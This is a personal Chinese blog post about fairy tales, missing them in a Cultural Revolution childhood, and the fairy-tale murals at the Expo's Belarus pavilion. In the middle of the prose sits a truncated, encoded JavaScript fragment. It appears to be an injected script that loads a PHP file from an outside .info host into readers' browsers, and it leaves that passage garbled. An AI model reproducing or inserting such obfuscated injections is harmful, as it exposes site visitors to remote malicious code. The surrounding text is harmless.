注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

习习的BLOG

当微风送花草清香,正是我想你的季节---且听风吟

 
 
 

日志

 
 

夏日之旅(五) 美丽的童话  

2010-08-10 18:27:22|  分类: 旅游图志 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

      

       毫无疑问,童话是属于孩子们的。

童话故事都很美好,这很符合孩子们的欣赏水平,在他们幼小的心灵里,世界本该是和平而充满阳光的。

童话里的人物大体分为两类:善良的和邪恶的,而且善恶分明,能让孩子们轻松的识别。

童话故事的结局多是美好而圆满的,这也不难理解,让孩子们从小就对这个世界充满希望和向往。

孩子在某个特定的年龄阶段,总会与童话为伴。或者《丑小鸭》,或者《小红帽》,或者《白雪公主与七个小矮人》,孩子们总能从中找到让他们喜欢的朋友。

迫不及待的听大人讲童话故事或者自己读童话,与百听不厌的童话故事朝夕相伴,可以让孩子的心灵得到真善美的启迪,日后成为他们一生的美好回忆。

非常遗憾的是,对于我这样一个在文革那样的特殊年代里度过了童年时代的人来说,童年却没有童话。那个时候,物质生活比较匮乏,人们的精神世界更是受到严重的束缚。以至于孩子们的生活也与童话绝了缘。取而代之的是带有浓厚政治色彩的各种小人书。至今还记得像《草原英雄小姐妹》之类的小人书,不过,当时的我们也读的津津有味。还有印象深刻的就是根据高尔基的自传体三部曲《童年》、《在人间》、《我的大学》改编的连环画。虽然以当时我的年龄不能完全理解小人书上的内容,但是,高尔基童年的艰辛生活却深深的印在了我的脑海中。

真正的接触到童话,是在女儿读童话的时候。90后的孩子,赶上了好时候,童年有太多可以选择的儿童读物,童话只是其中的一部分。于是,我也在给女儿读童话的过程中补上了自己童年缺失的一课。

如今,已过了不惑之年的我,早已远离了童话,远离了对美好事物的憧憬和幻想,切切实实的一头扎在了现实的生活中,忙碌的过着枯燥、平常的日子。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<忽然某一天,走进了世博园,走到了白俄罗斯馆那充满浓郁童话色彩的壁画下面,我的眼球立刻被那充满异国风情的壁画所吸引,仿佛置身在一个美丽的童话世界,自己也仿佛变成了童话中的人物,心底里潜藏了太久的童话情结忽然间被唤醒,于是,顾不得年龄、抛开了一切的顾忌,尽情的投入到了那个现实中的童话,痛快的圆了一场童年的梦。

也许,我们每个人的心底都潜藏着一个美丽的童话,只是它被严酷的现实包裹的太紧。

我要面对平凡的现实,我也要编织美丽的童话,我还要把美丽的童话变成平凡的现实,这是我的梦想。 

美丽的童话 - 且听风吟 - 习习的BLOG美丽的童话 - 且听风吟 - 习习的BLOG

 

美丽的童话 - 且听风吟 - 习习的BLOG

美丽的童话 - 且听风吟 - 习习的BLOG

 美丽的童话 - 且听风吟 - 习习的BLOG

 美丽的童话 - 且听风吟 - 习习的BLOG

 

 

  评论这张
 
阅读(159)| 评论(9)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017